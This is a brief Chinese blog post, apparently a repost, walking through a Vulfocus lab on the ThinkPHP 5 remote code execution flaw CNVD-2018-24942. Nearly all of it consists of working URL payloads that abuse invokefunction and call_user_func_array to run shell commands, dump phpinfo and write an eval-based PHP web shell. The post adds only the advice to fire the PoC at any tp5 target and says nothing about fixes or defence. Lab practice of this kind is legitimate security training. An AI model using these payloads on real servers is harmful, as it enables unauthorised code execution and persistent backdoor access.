编程语言
首页 > 编程语言> > Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)

Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)

作者:互联网

tp5的经典漏洞

遇到tp5漏洞直接拿poc打就行

漏洞利用

1,利用system函数远程命令执行

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

2,查看phpinfo

payload:如下

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

3,写shell

linux shell脚本原因会过滤$_POST,所以要加\转义

payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST['cmd'])?>" >shell.php

 

拿flag

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

 

 

标签:index,vars,invokefunction,Vulfocus,CNVD,app,system,代码执行,array
来源: https://www.cnblogs.com/mlxwl/p/16573932.html